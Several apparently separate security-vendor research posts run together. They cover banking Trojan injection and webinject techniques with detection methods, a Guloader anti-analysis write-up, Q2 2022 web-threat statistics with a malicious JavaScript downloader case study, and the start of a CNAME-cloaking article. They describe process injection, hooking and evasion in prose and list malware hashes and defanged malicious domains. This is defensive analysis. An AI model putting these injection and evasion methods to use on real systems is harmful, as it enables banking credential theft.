Banking Trojan Techniques: How Financially Motivated Malware Became Infrastructure

Executive Summary

While advanced persistent threats get the most breathless coverage in the news, many threat actors have money on their mind rather than espionage. You can learn a lot about the innovations used by these financially motivated groups by watching banking Trojans.

Because attackers constantly create new techniques to evade detection and perform malicious acts, studying monetarily motivated malware can help defenders understand threat actor tactics and protect organizations more effectively. Some of the banking Trojans described here are historically known for being financial malware, but now they’re primarily used as infrastructure to deliver other malware. Which is to say, by preventing techniques used by banking Trojans, you can also stop other types of threats.

We’ll survey techniques used by notorious banking Trojan families to evade detection, steal sensitive data and manipulate data. We’ll also describe how those techniques can be blocked. These families include Zeus, Kronos, Trickbot, IcedID, Emotet and Dridex.

Palo Alto Networks customers are protected from such attacks using Cortex XDR and WildFire.

Banking Trojan families' techniques discussed Zeus, Kronos, Trickbot, IcedID, Emotet, Dridex

What Are Webinjects?

Webinjects are modules that can inject HTML or JavaScript before a web page is rendered, and are often used to trick users. They are known to be abused by banking Trojans, as well as being employed to steal credentials and manipulate form data inside web pages. In most banking Trojan families, there is at least one webinjects module.

An early stager of the banking Trojan usually injects the banking Trojan’s main bot into a Windows process, and that process injects the webinjects module into the machine’s available web browser processes as shown in Figure 1.

Code snippet showing Trickbot going through browser processes including Chrome, Internet Explorer, Firefox and Microsoft Edge, to inject with its webinjects module.
Figure 1. Trickbot goes through processes one by one to find browsers to inject with its webinjects module, using a stealthy technique known as reflective injection.

The webinjects module hooks the API calls responsible for sending, receiving or encrypting data sent to a web server. By intercepting the data before it is encrypted, the malware can read HTTP-POST headers and manipulate them on the fly.

Code snippet showing Trickbot webinjects module going through browser processes including Internet Explorer, Microsoft Edge, Chrome and Firefox to place hooks.
Figure 2. Trickbot webinjects module placing hooks based on the browser.
Code snippet showing Trickbot placing hooks on Wininet.dll functions including HttpSendRequestA, HttpSendRequestW, HttpSendRequestExA, HttpSendRequestExW and InternetCloseHandle.
Figure 3. Trickbot placing hooks on wininet.dll functions.

By fully controlling the HTTP headers just before the webpage is rendered, the malware can completely modify the forms and fool the user. The malware may inject HTML or JavaScript code to trick the user into inserting sensitive information, such as a PIN code or credit card number, enabling the malware to collect it. The malware can extract this information and send it to its command and control (C2) server without actually sending the forged headers to the targeted web page server.

Chrome (chrome.dll) Firefox (nspr3.dll / nspr4.dll) Internet Explorer / Edge (Wininet.dll)
ssl_read PR_Read HttpSendRequest
ssl_write PR_Connect InternetCloseHandle
PR_Close InternetReadFile
PR_Write InternetQueryDataAvailable
HttpQueryInfo
InternetWriteFile
HttpEndRequest
InternetQueryOption
InternetSetOption
HttpOpenRequest
InternetConnect

Table 1. Frequently hooked API functions.

How to Detect Webinjects

This technique can be prevented by detecting an injection into a web browser process. The injected thread calls the NtProtectVirtualMemory function where the NewAccessProtection argument is PAGE_EXECUTE_READWRITE and the BaseAddress argument is an address to a library function targeted by banking Trojans.

For example, Trickbot uses both VirtualProtect and VirtualProtectEx in its various versions. Inspecting NtProtectVirtualMemory calls covers both.

Some banking Trojans opt to avoid code injection. Instead, they suspend the remote process threads and install the hooks remotely. Inspecting remote NtProtectVirtualMemory calls can detect this variant technique.

Code snippet showing NtProtectVirtualMemory prototype.
Figure 4. NtProtectVirtualMemory prototype.

Infecting Web Browsers During Process Creation

Some banking Trojans aim to infect a target process as soon as it is launched, by injecting code into a predicted parent process of the real target. Once the banking Trojan executes in the context of the parent process, it hooks process creation library functions and waits until the real target is created.

Inside the hook, the banking Trojan manipulates the process creation flow. Then, for example, it initializes the webinjects module inside the remote process. The explorer.exe and runtimebroker.exe parent processes are frequently abused for this goal, as they usually launch the real targets.

For instance, the Karius banking Trojan used this technique by injecting code into explorer.exe and hooking CreateProcessInternalW. The Trojan’s hook handler looked for a spawned web browser process and injected the malicious webinjects module into it.

How to Prevent Attempts to Infect Web Browsers During Process Creation

This technique can be prevented by looking for an injection into explorer.exe or runtimebroker.exe, where the injected thread hooks process creation functions like NtCreateUserProcess, NtCreateProcessEx, CreateProcessInternalW, CreateProcessA or CreateProcessW.

Named Pipe Communication Between Injected Processes

Many banking Trojans use named pipes to communicate with various processes under the threat actor’s control. To do this, they inject their main bot into a Windows process, and then inject their other modules into different processes according to the module’s purpose. They then establish communication between the different processes using named pipes.

For example, Trickbot injects the main bot into svchost.exe. It creates a named pipe server and reflectively injects the webinjects module into web browsers. This injected module connects to the same named pipe as a client to communicate to the main bot and deliver the fetched credentials to the C2 server.

Code snippet showing Trickbot creating a named pipe server.
Figure 5. Trickbot named pipe server.

How to Prevent Named Pipe Communication Between Injected Processes

This technique can be prevented by inspecting named-pipe events. An injected thread creates a named pipe inside a Windows process, and then another injected thread that lives inside a web browser attempts to connect to that same named pipe.

Heaven’s Gate Injection Technique

Heaven's Gate is a technique used by malware, which enables a 32-bit (WoW64) process to execute 64-bit code by performing a far jump/call using segment selector 0x33. Modern malware uses Heaven's Gate to inject into both 64-bit and 32-bit processes from a single 32-bit process on x64 systems. This bypasses WoW64 API hooks, it hinders analysis on some debuggers, and it fails emulation on some sandboxes.

Even though this method is old, it is still effective and frequently used.

Trickbot and Emotet loaders use Heaven's Gate for process hollowing from a WoW64 process into a 64-bit svchost.exe (For more about process hollowing, see the section on Evasive Process Hollowing By Entrypoint Patching below). The architecture of these two banking Trojans dictates that their main bot persists inside svchost.exe while the web content manipulation and credential stealing modules live inside the browser processes.

Showing Emotet using Heaven's Gate technique in its Microsoft Outlook Messaging API module.
Figure 6. Emotet using Heaven's Gate in its Microsoft Outlook Messaging API (MAPI) module.

How to Prevent Heaven's Gate

A WoW64 process usually goes through the wow64cpu.dll to perform the transition to x64 CPU mode. Heaven's Gate does this transition manually.

Prevention methods can find Heaven's Gate by inspecting whether a WoW64 process system call didn’t go through the wow64cpu.dll. This can be done by placing hooks on critical APIs, generating a stack trace and inspecting the stack trace for wow64cpu.dll.

Showing WoW64's normal syscall flow.
Figure 7. WoW64’s normal syscall flow.

Evasive Process Hollowing by Entrypoint Patching

Process hollowing is a process injection technique that creates a new legitimate process in a suspended mode, unmaps its main image and replaces it with malicious code. The malicious code is written into the newly created process and the suspended thread context instruction pointer is changed using NtGetContextThread/NtSetContextThread.

Security product vendors check for main image unmapping combined with the usage of NtGetContextThread/NtSetContextThread to detect process hollowing.

A known technique for evading detection is to patch the process entry point with a small jump that redirects execution to the payload without actually using NtGetContextThread/NtSetContextThread functions or unmapping the main image. For example, Trickbot and Kronos have both used this technique.

Kronos mapped a suspended svchost.exe into its own process and patched it in its own memory address space. Similar to other banking Trojans, Kronos' main module ran within svchost.exe and orchestrated the whole operation from the remote svchost.exe process.

Trickbot implemented process hollowing by first using VirtualProtectEx on the process entrypoint, and then writing the hook stub using WriteProcessMemory.

Code snippet showing Kronos mapping svchost.exe and patching its entrypoint.
Figure 8. Kronos mapping svchost.exe and patching its entrypoint.
Figure 9. Kronos hook stub template – x86 opcodes for push and ret.
Figure 9. Kronos hook stub template – x86 opcodes for push and ret.

How to Prevent Evasive Process Hollowing by Entrypoint Patching

This technique can be prevented either by inspecting whether the address argument provided to the calls of NtWriteVirtualMemory or NtProtectVirtualMemory is a remote process entry point or by detecting suspicious remote mapping and reading of svchost.exe memory.

PE Injection

Common injection methods used by banking Trojans involve writing a mapped PE into a remote process using WriteProcessMemory. Some malware families try to obscure the call by wiping artifacts from the buffer, such as wiping the PE header.

For example, Zeus variants use this technique to inject themselves into other processes, allowing them to stay hidden, as well as to perform webinjects and to perpetrate financial data theft.

Code snippet from Zeus injection code, taken from its leaked source code.
Figure 10. Zeus injection code from its leaked source code.

How to Prevent PE Injection

This technique can be prevented by inspecting the buffer sent to NtWriteVirtualMemory for executable artifacts.

Process Injection via Hooking

Hooking can be used as an injection technique. Injecting a banking Trojan’s main payload into a legitimate-looking process maintains stealth and helps avoid endpoint protection detection.

This technique utilizes hooking to get code execution, usually by hooking a frequently called API function with a jump to a payload/shellcode. This avoids calling any suspicious APIs often used in code injection techniques like CreateRemoteThread or NtSetContextThread.

For instance, IcedID injects its main bot into a hollowed instance of svchost.exe using API hooking. This is also known as the ZwClose technique (ZwClose was the hooked API in Zberp, the first to employ this injection technique in the wild).

The injection flow of IcedID is slightly different than that of Zberp. It first hooks NtCreateUserProcess and then calls CreateProcessA to create svchost.exe without any special parameters or argument. In a regular flow, the newly created svchost.exe should terminate right away.

Code snippet from IcedID initiating svchost.exe hooking.
Figure 11. IcedID initiates svchost.exe hooking.
Code snippet from IcedID hooking NtCreateUserProcess.
Figure 12. IcedID hooks NtCreateUserProcess.

However, because IcedID hooked NtCreateUserProcess, the hook handler is called right after the call to CreateProcessA. In the handler, it performs the following activities:

  • Unhooks NtCreateUserProcess
  • Calls NtCreateUserProcess (which creates svchost.exe)
  • Decompresses a local buffer that contains the payload to inject using RtlDecompressBuffer
  • Allocates memory for the payload at the remote svchost.exe process
  • Writes the payload into the remote svchost.exe using NtAllocateVirtualMemory and ZwWriteVirtualMemory

For the execution, IcedID hooks RtlExitUserProcess in the newly created svchost.exe with a jump stub to the payload. As mentioned, svchost.exe was created without any parameters and it will try to exit. However, due to the IcedID hook, it will jump to the payload.

Code snippet from IcedID hooking RtlExitUserProcess.
Figure 13. IcedID hooks RtlExitUserProcess.

How to Prevent Injection via Hooking

This technique can be prevented by inspecting calls to NtProtectVirtualMemory and NtWriteVirtualMemory. The provided address argument for NtProtectVirtualMemory is an exported function from one of the Windows libraries, and the NtWriteVirtualMemory written buffer is a hooking stub. In both cases, the remote process has to be a known injection target.

AtomBombing Injection Technique

AtomBombing is a technique that allows malware to inject code while avoiding calling suspicious APIs that security vendors are watching. Dridex uses a slightly modified AtomBombing technique that injects one of its stages into a Windows process (usually explorer.exe) and employs various steps to cause financial data theft.

Malware using the AtomBombing technique first writes the payload into the global atom table, which can be accessed by all processes. They then dispatch an asynchronous procedure call (APC) to the APC queue of a target process thread using NtQueueApcThread, forcing the target process to call GlobalGetAtomA.

The target thread then retrieves the payload from the global atom table and inserts it into a read/write (RW) region inside the target process memory space (a code cave inside the kernelbase.dll data section). The payload has to be split into NULL-terminated strings and an atom is created for each string.

For the execution, the injector process dispatches another APC using NtQueueApcThread to force the remote process to execute NtSetContextThread. The injected process then calls NtSetContextThread, which invokes a return-oriented programming (ROP) chain that allocates execute/read/write (RWX) memory. The ROP chain then copies the payload from the RW region into the newly allocated RWX region, and lastly, executes it.

The unique idea behind AtomBombing is the write-primitive, which allows writing to the remote process using atom tables and APC.

Dridex uses a variation of AtomBombing that queues an APC to call memset to clean an RW region in ntdll.dll. Then, it copies the payload and its import table into the target process using the same write technique into the ntdll.dll RW region.

For the execution, Dridex modifies the copied payload memory into executable memory using NtProtectVirtualMemory. Then it hooks GlobalGetAtomA by calling NtProtectVirtualMemory and by using the same write primitive. Finally, it queues an APC into the patched GlobalGetAtomA to get the payload running.

Code snippet from AtomBombing proof of concept
Figure 14. AtomBombing proof of concept code.

How to Prevent AtomBombing and its Variants

These techniques can be prevented by inspecting whether the arguments provided to NtQueueApcThread/NtSetContextThread calls point to a suspicious API – the APC routine argument in the case of NtQueueApcThread, or the new instruction pointer in the context argument in the case of NtSetContextThread. Both API calls have to be called into a remote process.

Conclusion

Threat actors who are in it for the money use a wide range of malware techniques for injection and financial fraud, and they are always looking for new ways to develop evasive techniques. We have explored some of the more interesting banking Trojan techniques and how they’re used to steal victims’ sensitive data. And finally, we describe how these techniques can be used to detect malicious behavior, so it can be prevented.

Palo Alto Networks customers using Cortex XDR receive protections from such attacks in different layers, including the following:

  • Local Analysis Machine Learning module
  • Behavioral Threat Protection
  • Behavioral indicators of compromise (BIOC) and Analytics BIOCs rules

These layers identify the tactics and techniques that banking Trojans use at different stages of their execution.

Palo Alto Networks customers also receive protections against the attacks discussed here through the WildFire cloud-delivered security subscription for the Next-Generation Firewall.

Indicators of Compromise

  • Trickbot
    • testnewinj32Dll.dll: 4becc0d518a97cc31427cd08348958cda4e00487c7ec0ac38fdcd53bbe36b5cc
    • Webinjects: ef6603a7ef46177ecba194148f72d396d0ddae47e3d6e86cf43085e34b3a64d4
  • Emotet: dd20506b3c65472d58ccc0a018cb67c65fab6718023fd4b16e148e64e69e5740
  • Kronos: aad98f57ce0d2d2bb1494d82157d07e1f80fb6ee02dd5f95cd6a1a2dc40141bc
  • Zeus: 0f409bc42d5cd8d28abf6d950066e991bf9f4c7bd0e234d6af9754af7ad52aa6
  • IcedID: 358af26358a436a38d75ac5de22ae07c4d59a8d50241f4fff02c489aa69e462f
  • Dridex: ffbd79ba40502a1373b8991909739a60a95e745829d2e15c4d312176bbfb5b3e

 

Defeating Guloader Anti-Analysis Technique

Executive Summary

Unit 42 researchers recently discovered a Guloader variant that contains a shellcode payload protected by anti-analysis techniques, which are meant to slow human analysts and sandboxes processing this sample. To help speed analysis for this sample and others like it, we are providing a complete Python script to deobfuscate the Guloader sample that is available on GitHub.

In early September 2022, we discovered a Guloader variant with low VirusTotal detection. Guloader (also known as CloudEye) is a malware downloader first discovered in December 2019.

We analyzed the control flow obfuscation technique used by this Guloader sample to create the IDA Processor module extension script so researchers can deobfuscate the sample automatically. The script can be applied to other malware families like Dridex, which utilize similar anti-analysis techniques.

Palo Alto Networks customers receive protections from malware families using similar anti-analysis techniques with Cortex XDR or the Next-Generation Firewall with cloud-delivered security services, including WildFire and Advanced Threat Prevention.

Related Unit 42 Topics Malware, anti-analysis

Guloader Control Flow Obfuscation Technique

The Guloader sample in question uses the control flow obfuscation technique to hide its functionalities and evade detection. This technique impedes both static and dynamic analysis.

First, let’s look at how this threat hampers static analysis. In short, it uses CPU instructions that trigger exceptions, resulting in unintelligible code during static analysis.

After peeling away the packer layer of our Guloader sample, we see that its code is obfuscated. Using static analysis tools such as IDA Pro, we observe many 0xCC bytes (or int3 instructions) littered throughout the sample, as shown in Figure 1.

Following the 0xCC bytes are junk instructions. These added bytes disrupt the static analysis tool’s disassembly process, resulting in the wrong disassembly listing.

Scrolling through obfuscated code to show 0xCC bytes throughout.
Figure 1. Obfuscated code blocks.

0xCC bytes are CPU instructions that trigger an exception EXCEPTION_BREAKPOINT (0x80000003), which pauses the execution of a process. The CPU will pass the code flow to the handler function before the execution continues. The handler function is responsible for moving the instruction pointer to the correct address.

The presence of these same 0xCC bytes make it so that using a debugger during dynamic analysis would crash the Guloader sample. Debuggers insert 0xCC bytes as software breakpoints to halt the execution of the sample. The debugger handles the exception instead of the handler function.

Before understanding what happens in the handler function, we first have to locate its address.

Guloader uses the AddVectoredExceptionHandler function to register the handler function, as shown in Figure 2. The second argument of the AddVectoredExceptionHandler function points to the address of the handler function.

Function prototype of AddVectoredExceptionHandler used to register the handler function.
Figure 2. Function prototype of AddVectoredExceptionHandler.

Using a debugger as shown in Figure 3, we locate the address of the handler function registered by the Guloader sample. With the address information, we can examine its code. Notably, this ExceptionHandler is registered with the order of 1, meaning it is the first handler to be invoked.

Using a debugger to locate the address of the AddVectoredExceptionHandler function registered by the Guloader sample.
Figure 3. Debugging the call to AddVectoredExceptionHandler in Guloader sample.

Analyzing the Vectored Exception Handler Function

The first step of analyzing the handler function is to apply its type information, as shown in Figure 4.

Showing the type information for the handler function.
Figure 4. Type information for the handler function.

Next, we apply the type information for three Windows data structures (shown in Figure 5) used by the handler function.

Showing the type information of three Windows data structures to be applied on the handler function.
Figure 5. Type information of three Windows data structures to be applied on the handler function.

With the type information applied, we can examine how the function handled the exceptions caused by the 0xCC bytes. Figure 6 shows the decompiled handler function (Func_VectoredExceptionHandler) annotated with comments.

Decompiled handler function (Func_VectoredExceptionHandler) annotated with the following comments: "Check type of exception raised," "Check for hardware breakpoint," "CC byte raising exception," "Decode offset byte," "Loop to check for software breakpoint," "Exit handler function if software breakpoint is found," and "Update EIP with offset."
Figure 6. Decompiled handler function.

The handler function begins with anti-debugging checks. It will terminate execution when hardware or software breakpoints are found. Next, the offset value is computed by XOR decoding the byte after the 0xCC byte with 0xA9. Finally, the offset value is added to the instruction pointer before the code execution resumes. Code execution continues at the address pointed to by the updated instruction pointer.

After understanding how the obfuscation is carried out, we can identify the legitimate instructions and discard the unwanted ones, as shown in Figure 7.

Labeled code block so we can identify the legitimate instructions and discard the unwanted ones
Figure 7. Labeled code block.

To completely deobfuscate the Guloader sample, we need to replace all the 0xCC bytes with a JMP short instruction (0xEB) and the following byte with the decoded offset value.

Because doing all this manually is time consuming, in the next section we will show you how to write an IDA Processor module extension to automate the deobfuscation process.

Writing an IDA Processor Module Extension

IDA Processor module extensions allow us to influence the disassembler logic in IDA Pro. These extensions are written using Python to enable us to filter and manipulate how IDA Pro disassembles the instructions in the sample.

The Python script extends the ev_ana_insn method in the IDP_Hooks class. It starts by checking if the current instruction is the 0xCC byte. Next, the 0xCC byte is replaced with the JMP short instruction (0xEB). Finally, the following byte is replaced with the decoded offset value.

Figure 8 shows the function in the Python script where this deobfuscation is implemented.

Function in the Python script where we're extending the ev_ana_insn() to deobfuscate the sample.
Figure 8. Extending the ev_ana_insn() to deobfuscate the sample.

After applying the Python script, IDA Pro can deobfuscate the Guloader sample automatically, as shown in Figure 9.

Code before and after applying the Python script so IDA Pro can deobfuscate the Guloader sample automatically
Figure 9: Obfuscated code (left) and code block after deobfuscation (right).

Conclusion: Malware Analysts vs. Malware Authors

Malware authors often include obfuscation techniques, hoping that they will increase the time and resources required for malware analysts to process their creations. Using the steps above, you can reduce the time needed to analyze these malware samples from Guloader, as well as those of other families using similar techniques.

Palo Alto Networks customers receive protections from malware families using similar anti-analysis techniques with Cortex XDR or the Next-Generation Firewall with cloud-delivered security services, including WildFire and Advanced Threat Prevention.

Indicators of Compromise

SQ21002728.IMG:
SHA256: fb8e52ec2e9d21a30d7b4dee8721d890a4fbec48103a021e9c04dfb897b71060
SQ21002764

SQ21002728.vbs:
SHA256: 56cdfaa44070c2ad164bd1e7f26744a2ffe54487c2d53d3ae318d842c6f56178
SQ21002764

Additional Resources

 

Trends in Web Threats in CY Q2 2022: Malicious JavaScript Downloaders Are Evolving

Executive Summary

Palo Alto Networks Advanced URL Filtering subscription collects data regarding two types of URLs; landing URLs and host URLs. We define a malicious landing URL as one that allows a user to click a malicious link. A malicious host URL is a page containing a malicious code snippet that could abuse someone’s computing power, steal sensitive information or perform other types of attacks.

Our researchers regularly track web threats to better understand trends that develop over time. This blog will cover trends we’ve identified between April 2022 and June 2022 using our web threat detection module.

Our detection module found around 751,000 incidents of malicious landing URLs containing different kinds of web threats, 253,000 (around one third) of which are unique URLs. In addition, the detection module also detected around 1,740,000 malicious host URLs, 256,000 (almost 15%) of which are unique.

In this blog, we present our analysis and findings of these web threat trends, including the following information:

  • When these web threats were more active
  • Where they were hosted
  • What categories they belong to
  • Which malware families are the most prevalent

We will also examine a malicious downloader case study regarding a campaign that shows how malicious JavaScript downloaders are evolving to evade different kinds of detections.

Palo Alto Networks customers receive protections from the web threats discussed here, as well as many others, via the Advanced URL Filtering, DNS Security and Threat Prevention cloud-delivered security services.

Types of Attacks and Vulnerabilities Covered Skimmer attacks, malware
Related Unit 42 Topics Information disclosure, A Closer Look at the Web Skimmer 

Web Threats Landing URLs: Detection Analysis

Between April and June 2022, we collected data from our customers with our Advanced URL Filtering subscription, within the web threat detection module which uses special YARA signatures. We detected 751,331 incidents of landing URLs, containing all kinds of web threats, such as web skimmers and web scams. 253,644 of these landing URLS were unique. Compared with the results from last quarter (Q1 2022), which had a total of 577,275 detected landing URLs and 116,643 unique URLs, we can see the totals rose in Q2.

Web Threats Landing URLs Detection: Time Analysis

Figure 1 shows the total number of web threat hits in Q2 of 2022, how many of those hits were unique, and how many of those hits were also observed last quarter. As we can see, the repeated unique number from Q1 is low, which suggests that attackers are always trying to target new entry points.

Bar chart describing web threats landing URLs distribution April-June 2022. Blue bars indicate all detections, including repeated detections of the same URL, red bars indicate detection of unique URLs, and orange bars indicate a detection that was seen in 2022 Q1 but unique in 2022 Q2.
Figure 1. Web threats landing URLs distribution April-June 2022. (Blue bars indicate all detections, including repeated detections of the same URL, and red bars indicate detection of unique URLs. Orange bars indicate a detection that was seen in Q1 2022 but unique in Q2 2022 ).

Web Threats Landing URLs: Geolocation Analysis

According to our analysis, the previously mentioned 253,644 unique URLs are from 34,833 unique domains. After identifying the geographical locations for these domain names, we found the majority of them seem to originate from the United States, followed by Germany and Russia, as was also the case last quarter. However, we recognize attackers are leveraging proxy servers and VPNs located in those countries to hide their actual physical locations.

The choropleth map shown in Figure 2 indicates the wide distribution of these domain names across almost every continent. Figure 3 shows the top eight countries where the owners of these domain names appear to be located.

Choropleth map showing the geolocation distribution of landing URLs between April and June 2022
Figure 2. Web threat landing URLs’ domain geolocation distribution April-June 2022.
Pie chart showing distribution of originating country of landing URLs from April to June 2022. United States - 64.4%, Germany - 4.9%, Russia - 2.0%, France - 2.0%, Canada - 1.8%, United Kingdom - 1.7%, Netherlands - 1.7%, India - 1.3%, Others - 20.2%
Figure 3. Top eight countries where web threat landing URLs’ domains originated April-June 2022.

Web Threats Landing URLs: Category Analysis

We analyzed the landing URLs initially identified by our detection model as benign, to find the common targets for these cyberattackers and where they may be trying to fool users. These landing URLs lead to people clicking on malicious host URLs. Going forward, all these landing URLs that lead to malicious code snippets will be marked as malicious by our product.

As shown in Figure 4, the top apparently benign targets are personal sites and blogs, followed by business and economy sites, and computer and internet information sites. Compared to last quarter, computer and internet information sites take third place over shopping sites. Because attackers often try to trick users into following malicious links from seemingly benign sites, we strongly recommend users exercise caution when visiting unfamiliar websites.

Pie chart showing the top 10 categories hosting web threats from April to June 2022. Personal sites and blogs - 14.3%, business and economy sites - 13.8%, computer and internet - 7.8%, shopping - 5.5%, health and medicine - 4.7%, society - 4.6%, entertainment and arts - 4.4%, search engines - 3.7%, parked - 3.4%, travel - 3.2%, Others - 34.7%
Figure 4. We divided landing URLs that originally appeared benign into categories. Here are the top 10 categories that hosted web threats April-June 2022.

Web Threats Malicious Host URLs: Detection Analysis

With Advanced URL Filtering, we detected 1,744,629 incidents of malicious host URLs from April to June 2022, of which 256,844 are unique URLs. The following section will take a closer look at those malicious host URLs. (“Malicious host URLs” specifically refers to pages containing malicious snippets that could abuse users' computing power, steal sensitive information, and so on).

Although the total number of hits is similar to last quarter’s total, the number of unique hits is much greater. This number rose by 42%, suggesting attackers are trying more variants with malicious behavior.

Web Threats Malicious Host URLs Detection: Time Analysis

Figure 5 shows the total number of web threat hits, including those categorized as unique hits.

Bar chart showing April-June 2022 on the X-axis, and 0-1,000,000 on the Y-axis. Key indicates blue bars are all hits, and red bars are unique hits. April 2022 = 805,6924 total hits: 76,866 unique hits. May 2022 = 385,834 total hits: 64,553 unique hits. June 2022 = 553,103 total hits: 115,425 unique hits.
Figure 5. Web threats malicious host URLs distribution from April-June 2022.

Web Threats Malicious Host URLs Detection: Geolocation Analysis

In our geolocation analysis of host URLS, we discovered that the 256,844 unique malicious host URLs belong to 23,663 unique domains. This is fewer unique domains than we observed for landing URLs.

After identifying the apparent geographical locations for these domain names, we found that the majority of them seem to originate from the United States – as we observe for web threats generally. Figure 6 shows a heat map illustrating these findings.

Choropleth map showing the geolocation distribution of malicious host URLs from April to June 2022
Figure 6. Web threats malicious host URLs’ domain geolocation distribution April-June 2022.

Figure 7 shows the top eight countries where the owners of these domain names appear to be located. Compared to what we observed for web threats overall – the top three countries were the United States, Germany and Russia – the top three host domain countries for malicious host URLs were the same. This matches our findings from last quarter.

Pie chart showing distribution of originating country of malicious host URLs from April to June 2022. United States - 66.0%, Germany - 4.8%, Russia - 2.4%, France - 1.7%, United Kingdom - 1.6%, Canada - 1.6%, Netherlands - 1.6%, India - 1.4%, Others - 18.9%
Figure 7. Top eight countries where web threats malicious host URLs’ domains appeared to be located April-June 2022.

 

Web Threats Malware Class Analysis

The top five web threats we observed are cryptominers, JavaScript downloaders, web skimmers, web scams and JavaScript redirectors. To define these classes, please refer to our blog, “The Year in Web Threats: Web Skimmers Take Advantage of Cloud Hosting and More”.

As shown in Figure 8, JavaScript downloader threats showed the most activity, followed by web skimmers and web miners (aka cryptominers). This finding is similar to last quarter.

Bar chart showing js_downloader, web_miner, web_skimmer, web_scam and js_redirector on the X-axis, and 0-1,000,000 on the Y-axis. Key indicates blue bars are all hits, and red bars are unique hits. Js_downloader = 930,359 total hits: 112,422 unique hits. Web_miner = 327,472 total hits: 25,590 unique hits. Web_skimmer = 337,710 total hits: 71,468 unique hits. Web_scam = 18,132 total hits: 3,749 unique hits. Js_redirector = 92,157 total hits: 2,988 unique hits.
Figure 8. Top five web threats category distribution April-June 2022.

Web Threats Malware Family Analysis

Based on our classification of web threats explained in the previous section, we further organized our set of web threats by malware family. The family is important to understanding how threats work, because threats in the same family share similar JavaScript code even if the HTML landing pages where they appear have different layouts and styles.

As we did in our yearly analysis, The Year in Web Threats: Web Skimmers Take Advantage of Cloud Hosting and More, we identified pieces of malware as part of a family by checking for certain characteristics: similar code patterns or behaviors, or having originated from the same attacker.

Figure 9 shows the number of snippets observed for the top 10 malware families we identified. As we’ve seen previously, there were fewer families of JS redirectors, web scams and JS downloaders, while web skimmers show more diversity in code and behavior.

Bar chart showing the web threat families along the X-axis, and 0-200,000 on the Y-axis. Key indicates that blue bars are total hits, and red bars are unique hits.
Figure 9. Web threat malware family distribution from April-June 2022.

Web Threats Case Study: Malicious JavaScript Downloader

Among all of the web threats we detected during this analysis, the most notable was a malicious JavaScript downloader commonly injected into webpages from a popular content management system. This downloader is injected into a legitimate webpage and redirects the user to ads, spam, etc.

We found many websites infected with variants from the same family, which is evolving to evade detection. When we first found this malware family, it was not obfuscated at all. But from a sample we found in the second quarter of 2022, we see it is lightly obfuscated to hide the redirection URL.

Figure 10 shows the malicious JavaScript code snippet from the source code of the compromised website.

JavaScript code snippet from the source code of the compromised website, lightly obfuscated with CharCode.
Figure 10. Source code of a malicious injected JavaScript code snippet.

As we can see, the snippet is lightly obfuscated with CharCode. After we deobfuscate the sample, we get the code shown in Figure 11.

The malicious JavaScript code creates several new script elements that redirect website visitors to another malicious destination. This example code is under the head of the page, which will be triggered whenever the page is clicked. We identified several malicious domains, including train[.]developfirstline[.]com, js[.]digestcolect[.]com and stat[.]trackstatisticsss[.]com.

Deobfuscated source code showing several malicious domains
Figure 11. Deobfuscated source code of a malicious injected JavaScript code snippet.

From a more recent sample we found in this malicious downloader family, the whole JavaScript code is highly obfuscated, as shown in Figure 12. After we deobfuscated the JavaScript function eval, the malicious code is like Figure 11 shown above.

Highly obfuscated code from a malicious downloader sample
Figure 12. Source code of a highly obfuscated malicious downloader sample.

From our detection data, we found around 5,000 hits for this type of JavaScript injection from our customers. This threat infected around 300 different domains from April 2022 to June 2022, which shows how active this malicious JavaScript downloader family is.

Conclusion

As we highlighted in this blog, the most prevalent web threats are still JS downloaders, cryptominers, web skimmers, web scams and JS redirectors. Of the landing URLs we analyzed, the top three verticals targeted by attackers were personal sites and blogs, business and economy sites, and computer and internet information sites.

We found one threat particularly notable, where a JavaScript downloader evolved over time to more effectively evade detection. Earlier in its history, variants from this family were less obfuscated, but more recent versions are more highly obfuscated.

While cybercriminals continue to seek opportunities for malicious cyber activities, Palo Alto Networks customers receive protection from the web threat attacks discussed here as well as many others, via the Advanced URL Filtering, DNS Security and Threat Prevention cloud-delivered security services.

We also recommend the following actions:

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Indicators of Compromise

Malicious Web Skimmer SHA256:
bb38741575706a94cc1a3ab43d445b641b2c225f408d67a76d3302ca1233e122

Train[.]developfirstline[.]com
Js[.]digestcolect[.]com
stat[.]trackstatisticsss[.]com

Acknowledgements

We would like to thank Mike Harbison, Billy Melicher, Alex Starov, Jun Javier Wang and Laura Novak for their help with the blog.

CNAME Cloaking: Disguising Third Parties Through the DNS

Executive Summary

When you visit a website, do you ever feel like you’re being watched? Who is observing your movements through that website - or across the internet in general? Is it possible to limit or at least understand that information flow?

With advertising at the heart of much of the internet, user data is an invaluable resource to those companies that profit from monitoring people’s online activities. In many cases, the information they collect provides helpful (if not truly necessary) support for a good user experience. In other cases, tracking practices infringe on people’s privacy, and they have raised valid concerns.

In response to these concerns, many groups have developed tools or adapted applications to protect user privacy. One step taken by major browsers is to block third-party cookies. This action has led analytics, advertising and marketing organizations to develop new strategies for collecting user information. One of these is CNAME cloaking.

CNAME cloaking leverages the Domain Name System (DNS) to hide when a browser is sending information to a domain controlled by a third party (such as an advertiser) rather than staying on the domain controlled by a website owner. CNAME cloaking undermines mechanisms that some people depend on to guard their privacy, and could lead to or be used with other practices that decrease people’s privacy.

Palo Alto Networks has developed a system to detect domains used in CNAME cloaking. The insights generated by this detector are available to Palo Alto Networks Next-Generation Firewall customers with cloud-delivered security services, including DNS Security and Advanced URL Filtering.

Related Unit 42 Topics DNS

How Tracking Leads to Cookies

Much of the content and many services available on the web are funded by revenue from advertising. Advertising has historically relied on tracking. This relationship stems from advertisers’ desire to maximize the efficiency of their marketing efforts.

One way advertisers try to maximize efficiency is to show people only advertisements for products or services they are likely to purchase. How do advertisers know which advertisements are actually relevant? While there is no cookie-cutter approach, tracking is currently a popular option.

In the context of the internet, tracking involves monitoring people’s activities within a website or across multiple websites. Tracking can serve many useful purposes.

For example, a website owner can use tracking data to personalize a customer’s experience, maintain their cart, or measure the effectiveness of an advertising campaign. Customers can benefit from these enhancements, and (where tracking is kept to a reasonable scope) issues regarding privacy can be limited. However, in practical application, the scope in which information is shared is often larger than a specific website or company.

Both website owners and advertisers use the services of companies specializing in analytics and marketing, which can include passing along user data. This data sometimes includes personal information. Even if it does not, the ability for various parties to collect information about users without their knowledge and consent – potentially across multiple sites and devices – has caused people much concern.

